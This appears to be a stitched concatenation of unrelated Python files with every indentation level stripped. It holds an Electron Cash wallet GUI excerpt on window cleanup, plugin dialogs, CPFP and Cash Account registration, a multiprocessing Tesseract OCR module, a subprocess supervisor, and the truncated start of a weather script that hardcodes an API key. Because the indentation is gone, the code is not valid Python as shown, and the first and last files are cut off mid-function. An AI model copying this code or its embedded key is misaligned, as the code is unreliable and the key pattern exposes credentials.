d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
disconnect_alias_received_signal() # aka self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_message(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice.
# clean_up() guards against that situation.
self.clean_up()
super().closeEvent(event)
event.accept() # paranoia. be sure it's always accepted.
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
del self.cashaddr_toggled_signal # delete alias so it doesn't interfere with below
for attr_name in dir(self):
if attr_name.endswith("_signal"):
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
# The below shouldn't even be needed, since Qt should take care of this,
# but Axel Gembe got a crash related to this on Python 3.7.3, PyQt 5.12.3
# so here we are. See #1531
try: self.gui_object.cashaddr_toggled_signal.disconnect(self.update_cashaddr_icon)
except TypeError: pass
try: self.gui_object.cashaddr_toggled_signal.disconnect(self.update_receive_address_widget)
except TypeError: pass
try: self.gui_object.cashaddr_status_button_hidden_signal.disconnect(self.addr_converter_button.setHidden)
except TypeError: pass
try: self.gui_object.update_available_signal.disconnect(self.on_update_available)
except TypeError: pass
try: self.disconnect()
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# Status bar holds references to self, so clear it to help GC this window
self.setStatusBar(None)
# Note that due to quirks on macOS and the shared menu bar, we do *NOT*
# clear the menuBar. Instead, doing this causes the object to get
# deleted and/or its actions (and more importantly menu action hotkeys)
# to go away immediately.
self.setMenuBar(None)
# Disable shortcuts immediately to prevent them from accidentally firing
# on us after we are closed. They will get deleted when this QObject
# is finally deleted by Qt.
for shortcut in self._shortcuts:
shortcut.setEnabled(False)
del shortcut
self._shortcuts.clear()
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget, QAction, TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame, QShortcut)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
if self.cleaned_up:
return
self.cleaned_up = True
if self.wallet.thread: # guard against window close before load_wallet was called (#1554)
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
for w in [self.address_list, self.history_list, self.utxo_list, self.cash_account_e, self.contact_list,
self.tx_update_mgr]:
if w: w.clean_up() # tell relevant object to clean itself up, unregister callbacks, disconnect signals, etc
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server,
# (due to ElectrumX protocol limitations).. but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(parent=self.top_level_window(), title=_('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
plugins.retranslate_internal_plugin_metadata(name)
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stderr)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel(_('{total_size} bytes').format(total_size=total_size)), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
def _pick_address(self, *, title=None, icon=None) -> Address:
''' Returns None on user cancel, or a valid is_mine Address object
from the Address list. '''
from .address_list import AddressList
# Show user address picker
d = WindowModalDialog(self.top_level_window(), title or _('Choose an address'))
d.setObjectName("Window Modal Dialog - " + d.windowTitle())
destroyed_print_error(d) # track object lifecycle
d.setMinimumWidth(self.width()-150)
vbox = QVBoxLayout(d)
if icon:
hbox = QHBoxLayout()
hbox.setContentsMargins(0,0,0,0)
ic_lbl = QLabel()
ic_lbl.setPixmap(icon.pixmap(50))
hbox.addWidget(ic_lbl)
hbox.addItem(QSpacerItem(10, 1))
t_lbl = QLabel("<font size=+1><b>" + (title or '') + "</b></font>")
hbox.addWidget(t_lbl, 0, Qt.AlignLeft)
hbox.addStretch(1)
vbox.addLayout(hbox)
vbox.addWidget(QLabel(_('Choose an address') + ':'))
l = AddressList(self, picker=True)
try:
l.setObjectName("AddressList - " + d.windowTitle())
destroyed_print_error(l) # track object lifecycle
l.update()
vbox.addWidget(l)
ok = OkButton(d)
ok.setDisabled(True)
addr = None
def on_item_changed(current, previous):
nonlocal addr
addr = current and current.data(0, l.DataRoles.address)
ok.setEnabled(addr is not None)
def on_selection_changed():
items = l.selectedItems()
if items: on_item_changed(items[0], None)
else: on_item_changed(None, None)
l.currentItemChanged.connect(on_item_changed)
cancel = CancelButton(d)
vbox.addLayout(Buttons(cancel, ok))
res = d.exec_()
if res == QDialog.Accepted:
return addr
return None
finally:
l.clean_up() # required to unregister network callback
def register_new_cash_account(self, addr = None):
''' Initiates the "Register a new cash account" dialog.
If addr is none, will use self.receive_address.
Alternatively, you may pass the string 'pick' in lieu of an address
if you want this function to present the user with a UI for choosing
an address to register.'''
if addr == 'pick':
addr = self._pick_address(title=_("Register A New Cash Account"), icon=QIcon(":icons/cashacct-logo.png"))
if addr is None:
return # user cancel
addr = addr or self.receive_address or self.wallet.get_receiving_address()
if not addr:
self.print_error("register_new_cash_account: no receive address specified")
return
def on_link(link):
if link == 'ca':
webopen('https://www.cashaccount.info/')
elif link == 'addr':
if self.wallet.is_mine(addr):
self.show_address(addr)
else:
url = web.BE_URL(self.config, 'addr', addr)
if url: webopen(url)
name, placeholder = '', 'Satoshi_Nakamoto'
while True:
lh = self.wallet.get_local_height()
le = ButtonsLineEdit()
help_msg = '<span style="font-weight:400;">' + \
_('<p>How it works: <b>Cash Accounts</b> registrations work by issuing an <b>OP_RETURN</b> transaction to yourself, costing fractions of a penny.</p>'
'<p>The registrations are permanently written to the blockchain and associate a human-friendly name with your address.</p>'
'<p>After the registration transaction receives <i>1 confirmation</i>, you can use your new <b>Cash Account name</b> as if it were an address and give it out to other people (Electron Cash or another Cash Account enabled wallet is required).</p>'
'<p><span style="font-weight:100;">You will be offered the opportunity to review the generated transaction before broadcasting it to the blockchain.</span></p>') + \
'</span>'
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
help_but = HelpButton(help_msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
le.addWidget(help_but)
name = line_dialog(self.top_level_window(),
_("Register A New Cash Account"),
(_("You are registering a new <a href='ca'>Cash Account</a> for your address <a href='addr'><b><pre>{address}</pre></b></a>").format(address=addr.to_ui_string())
+ _("The current block height is <b><i>{block_height}</i></b>, so the new cash account will likely look like: <b><u><i>AccountName<i>#{number}</u></b>.")
.format(block_height=lh or '???', number=max(cashacct.bh2num(lh or 0)+1, 0) or '???')
+ "<br><br><br>" + _("Specify the <b>account name</b> below (limited to 99 characters):") ),
_("Proceed to Send Tab"), default=name, linkActivated=on_link,
placeholder=placeholder, disallow_empty=True,
line_edit_widget = le,
icon=QIcon(":icons/cashacct-logo.png"))
if name is None:
# user cancel
return
name = name.strip()
if not cashacct.name_accept_re.match(name):
self.show_error(_("The specified name cannot be used for a Cash Accounts registration. You must specify 1-99 alphanumeric (ASCII) characters, without spaces (underscores are permitted as well)."))
continue
self._reg_new_cash_account(name, addr)
return
def _reg_new_cash_account(self, name, addr):
self.show_send_tab()
self.do_clear()
# Enabled OP_RETURN stuff even if disabled in prefs. Next do_clear call will reset to prefs presets.
self.message_opreturn_e.setVisible(True)
self.opreturn_rawhex_cb.setVisible(True)
self.opreturn_label.setVisible(True)
# Prevent user from modifying required fields, and hide what we
# can as well.
self.message_opreturn_e.setText(cashacct.ScriptOutput.create_registration(name, addr).script[1:].hex())
self.message_opreturn_e.setFrozen(True)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_rawhex_cb.setDisabled(True)
self.amount_e.setAmount(0)
self.amount_e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setHidden(True)
self.payto_label.setHidden(True)
# Set a default description -- this we allow them to edit
self.message_e.setText(
_("Cash Accounts Registration: '{name}' -> {address}").format(
name=name, address=addr.to_ui_string()
)
)
# set up "Helpful Window" informing user registration will
# not be accepted until at least 1 confirmation.
cashaccounts_never_show_send_tab_hint = self.config.get('cashaccounts_never_show_send_tab_hint', False)
if not cashaccounts_never_show_send_tab_hint:
msg1 = (
_("The Send Tab has been filled-in with your <b>Cash Accounts</b> registration data.")
+ "<br><br>" + _("Please review the transaction, save it, and/or broadcast it at your leisure.")
)
msg2 = ( _("After at least <i>1 confirmation</i>, you will be able to use your new <b>Cash Account</b>, and it will be visible in Electron Cash in the <b>Addresses</b> tab.")
)
msg3 = _("If you wish to control which specific coins are used to "
"fund this registration transaction, feel free to use the "
"Coins and/or Addresses tabs' Spend-from facility.\n\n"
"('Spend from' is a right-click menu option in either tab.)")
res = self.msg_box(
# TODO: get SVG icon..
parent = self, icon=QIcon(":icons/cashacct-logo.png").pixmap(75, 75),
title=_('Register A New Cash Account'), rich_text=True,
text = msg1, informative_text = msg2, detail_text = msg3,
checkbox_text=_("Never show this again"), checkbox_ischecked=False
)
if res[1]:
# never ask checked
self.config.set_key('cashaccounts_never_show_send_tab_hint', True)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.cleaned_up = False
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
self.full_hist_refresh_timer = QTimer(self)
self.full_hist_refresh_timer.setInterval(1000); self.full_hist_refresh_timer.setSingleShot(False)
self.full_hist_refresh_timer.timeout.connect(self.schedule_full_hist_refresh_maybe)
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def clean_up(self):
self.cleaned_up = True
main_window_parent = self.weakParent() # weak -> strong ref
if main_window_parent:
try: main_window_parent.history_updated_signal.disconnect(self.verifs_get_and_clear)
except TypeError: pass
try: main_window_parent.on_timer_signal.disconnect(self.do_check)
except TypeError: pass
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
update_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
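# A minimal sketch of how the network thread would feed this manager; the
# event names here are assumptions, in the style of the unregister_callback
# calls seen in clean_up_connections() above:
#
#   network.register_callback(tx_update_mgr.verif_add, ['verified2'])
#   network.register_callback(tx_update_mgr.notif_add, ['new_transaction'])
#
# Both callbacks only append to a queue and set a flag under the lock, so the
# network thread stays cheap; the GUI drains them later via do_check().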
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
t0 = time.time()
parent.history_list.setUpdatesEnabled(False)
had_sorting = parent.history_list.isSortingEnabled()
if had_sorting:
parent.history_list.setSortingEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI in {:0.2f} ms"
.format(n_updates, len(items), (time.time()-t0)*1e3))
if had_sorting:
parent.history_list.setSortingEnabled(True)
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
if parent.history_list.has_unknown_balances:
self.print_error("History tab: 'Unknown' balances detected, will schedule a GUI refresh after wallet settles")
self._full_refresh_ctr = 0
self.full_hist_refresh_timer.start()
_full_refresh_ctr = 0
def schedule_full_hist_refresh_maybe(self):
''' self.full_hist_refresh_timer timeout slot. May schedule a full
history refresh after wallet settles if we have "Unknown" balances. '''
parent = self.weakParent()
if self._full_refresh_ctr > 60:
# Too many retries. Give up.
self.print_error("History tab: Full refresh scheduler timed out.. wallet hasn't settled in 1 minute. Giving up.")
self.full_hist_refresh_timer.stop()
elif parent and parent.history_list.has_unknown_balances:
# Still have 'Unknown' balance. Check if wallet is settled.
if self.need_process_v or not parent.wallet.is_fully_settled_down():
# Wallet not fully settled down yet... schedule this function to run later
self.print_error("History tab: Wallet not yet settled.. will try again in 1 second...")
else:
# Wallet has settled. Schedule an update. Note this function may be called again
# in 1 second to check if the 'Unknown' situation has corrected itself.
self.print_error("History tab: Wallet has settled down, latching need_update to true")
parent.need_update.set()
self._full_refresh_ctr += 1
else:
# No more polling is required. 'Unknown' balance disappeared from
# GUI (or parent window was just closed).
self.full_hist_refresh_timer.stop()
self._full_refresh_ctr = 0
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
txns = self.notifs_get_and_clear()
if txns:
# Combine the transactions
n_ok, n_cashacct, total_amount = 0, 0, 0
last_seen_ca_name = ''
ca_txs = dict() # 'txid' -> ('name', address) -- will be given to contacts_list for "unconfirmed registrations" display
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
for _typ, addr, val in tx.outputs():
# Find Cash Account registrations that are for addresses *in* this wallet
if isinstance(addr, cashacct.ScriptOutput) and parent.wallet.is_mine(addr.address):
n_cashacct += 1
last_seen_ca_name = addr.name
txid = tx.txid_fast()
if txid: ca_txs[txid] = (addr.name, addr.address)
if not is_relevant:
continue
total_amount += v
n_ok += 1
if n_cashacct:
# Unhide the Addresses tab if cash account reg tx seen
# and user never explicitly hid it.
if parent.config.get("show_addresses_tab") is None:
# We unhide it because presumably they want to SEE
# their cash accounts now that they have them --
# and part of the UI is *IN* the Addresses tab.
parent.toggle_tab(parent.addresses_tab)
# Do same for console tab
if parent.config.get("show_contacts_tab") is None:
# We unhide it because presumably they want to SEE
# their cash accounts now that they have them --
# and part of the UI is *IN* the Console tab.
parent.toggle_tab(parent.contacts_tab)
if ca_txs:
# Notify contact_list of potentially unconfirmed txs
parent.contact_list.ca_update_potentially_unconfirmed_registrations(ca_txs)
if parent.wallet.storage.get('gui_notify_tx', True):
ca_text = ''
if n_cashacct > 1:
# plural
ca_text = " + " + _("{number_of_cashaccounts} Cash Accounts registrations").format(number_of_cashaccounts = n_cashacct)
elif n_cashacct == 1:
# singular
ca_text = " + " + _("1 Cash Accounts registration ({cash_accounts_name})").format(cash_accounts_name = last_seen_ca_name)
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(max(n_ok, n_cashacct)))
if max(n_ok, n_cashacct) > 1:
parent.notify(_("{} new transactions: {}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True)) + ca_text)
else:
parent.notify(_("New transaction: {}").format(parent.format_amount_and_units(total_amount, is_diff=True)) + ca_text)
elif n_cashacct:
# No total amount (was just a cashacct reg tx)
ca_text = ca_text[3:] # pop off the " + "
if n_cashacct > 1:
parent.notify(_("{} new transactions: {}")
.format(n_cashacct, ca_text))
else:
parent.notify(_("New transaction: {}").format(ca_text))
# Play the sound effect ('ard moné edition only)
if parent.tx_sound:
parent.tx_sound.play()
|
multiprocess.py | import config
import multiprocessing, cv2, copy, time
from multiprocessing import Queue
from src.utilities.tesseract.helper import tess_eval,add_lines_to_tess_queue
from src.utilities.tesseract.utils import frequent_height,scale_coords,crop_region,get_tess_text
from src.utilities.tesseract.dynamic_adjustment import coord_adjustment
from anuvaad_auditor.loghandler import log_info
from anuvaad_auditor.loghandler import log_exception
import src.utilities.app_context as app_context
tessract_queue = Queue()
file_writer_queue = Queue()
def start_tess_eval(workers= config.BATCH_SIZE):
process = []
for w in range(workers):
process.append(multiprocessing.Process(target=tesseract_eval))
process[-1].start()
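# Each worker started above blocks on tessract_queue.get() and pushes either
# a result triple or an empty list (on error) to file_writer_queue, so the
# caller below can simply count completions against its expected line total.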
def tesseract_eval():
while True:
try:
line_data = tessract_queue.get(block=True)
if len(line_data)>0:
line_stats,rgn_idx,line_idx= tess_eval(line_data)
file_writer_queue.put([line_stats,rgn_idx,line_idx])
else:
file_writer_queue.put([])
except Exception as e:
file_writer_queue.put([])
log_exception("Error in tesseract multiprocesing ", app_context.application_context, e)
start_tess_eval()
def get_queue_words():
page_words=[]
while file_writer_queue.qsize()>0:
line_info = file_writer_queue.get()
if len(line_info)>0:
page_words.append(line_info)
return page_words
def collate_words(page_regions,page_words):
for word_idx,word_info in enumerate(page_words):
word,rgn_idx,line_idx = word_info
page_regions[rgn_idx]['regions'][line_idx]['regions'] = copy.deepcopy(word)
return page_regions
def get_mode_height(page_regions):
page_lines=[]
if len(page_regions)>0:
for rgn_idx, region in enumerate(page_regions):
if region is not None and len(region)>0 and 'regions' in region.keys():
for line_idx,line in enumerate(region['regions']):
page_lines.append(line)
# guard against an empty page so mode_height is always bound before return
mode_height = frequent_height(page_lines) if page_lines else None
return mode_height
def multi_processing_tesseract(page_regions,image_path,lang,width,height):
try:
img = cv2.imread(image_path)
mode_height = get_mode_height(page_regions)
if len(page_regions)>0:
total_lines=0
for rgn_idx, region in enumerate(page_regions):
if region!=None and len(region)>0 and 'regions' in region.keys():
for line_idx,line in enumerate(region['regions']):
line=[line]
if config.IS_DYNAMIC:
line = coord_adjustment(image_path,line)
if len(line)>0:
total_lines+=1
if config.MULTIPROCESS:
add_lines_to_tess_queue(line,tessract_queue,lang,img,mode_height,rgn_idx,line_idx)
if config.MULTIPROCESS==False and len(line)>0:
vertices = line[0]['boundingBox']['vertices']
left = vertices[0]['x']; top = vertices[0]['y']
image_crop = crop_region(line[0],img)
if image_crop is not None and image_crop.shape[1] >3 and image_crop.shape[0] > 3:
words = get_tess_text(image_crop,lang,mode_height,left,top)
page_regions[rgn_idx]['regions'][line_idx]['regions'] = copy.deepcopy(words)
if config.MULTIPROCESS:
while file_writer_queue.qsize() < total_lines:
time.sleep(0.01) # yield the CPU instead of busy-spinning
page_words = get_queue_words()
page_regions = collate_words(page_regions,page_words)
return page_regions
else:
return page_regions
except Exception as e:
log_exception("Error in tesseract ocr", app_context.application_context, e)
return page_regions
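# Illustrative call (the path, language code and page size are hypothetical):
#
#   regions = multi_processing_tesseract(page_regions, '/tmp/page-1.jpg',
#                                        'eng', width=2480, height=3508)
#
# With config.MULTIPROCESS set, lines are fanned out to the workers started by
# start_tess_eval(); otherwise each line is cropped and OCR'd inline.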
|
main.py | #!/bin/python3.8
import subprocess
import json
import time
import threading
class Interrupt ():
def __init__(self, code: int, response: str):
self.code = code
self.response = response
def __repr__(self):
return str(self.__dict__)
class Program ():
def __init__(self, exec: str, interrupts=None, reopen=False):
self.exec = exec
# avoid a mutable default argument; None stands in for "no interrupts"
self.interrupts = [Interrupt(**i) for i in (interrupts or [])]
self.reopen = reopen
self.command = self.exec.split(' ')
self.process = None
self.thread_loop = threading.Thread(target=self.thread_run)
self.thread_loop.start()
def thread_run(self):
if not self.process:
self.process = subprocess.Popen(self.command)
main_thread = threading.main_thread()
while main_thread.is_alive():
code = self.process.poll()
self.exec_interrupt(code)
if code is not None and self.reopen:
self.close()
self.process = subprocess.Popen(self.command)
time.sleep(0.1) # poll at a modest rate instead of hot-spinning
self.close()
exit(0)
def exec_interrupt(self, code: int):
interrupt = self.interrupt_key(code)
if interrupt is None:
return
# interrupt_key returns an Interrupt object, so match on its response
# field; comparing the object itself to 'close' could never succeed
if interrupt.response == 'close':
self.close()
self.reopen = False
def interrupt_key(self, key: int):
# return the first registered Interrupt whose code matches, else None
return next((i for i in self.interrupts if i.code == key), None)
def close(self):
self.process.terminate()
def __repr__(self):
return str(self.__dict__)
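# For reference, a minimal startup.json this supervisor could consume (the
# concrete command and codes are illustrative, not from the original):
#
#   [
#     {"exec": "python3 worker.py", "reopen": true,
#      "interrupts": [{"code": 1, "response": "close"}]}
#   ]
#
# main() below splats each entry into Program(**program); 'interrupts' maps a
# child's exit code to a response such as 'close'.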
def main():
file = open('startup.json')
startup = json.load(file)
programs = [Program(**program) for program in startup]
[print(program, '\n') for program in programs]
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
main.py | import datetime
import json
import logging
import random
import sys
import requests
import threading
import time
import robonomicsinterface as RI
from typing import Optional
# set up logging
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s: %(message)s",
)
API_KEY = 'f601b0c9e92272482e5403fb30a9be7a'
BASE_URL = "https://api.openweathermap.org/data/2.5/weather?"
def get_weather() -> Optional[dict]:
city_num = random.randrange(len_city_list)
city_id = city_list[city_num]["id"]
city_name = city_list[city_num]["name"] + ', ' + city_list[city_num]["country"]
url = BASE_URL + "id=" + str(city_id) + "&appid=" + API_KEY
response = requests.get(url)
if response.status_code == 200:
data = response.json()
main_inf = data['main']
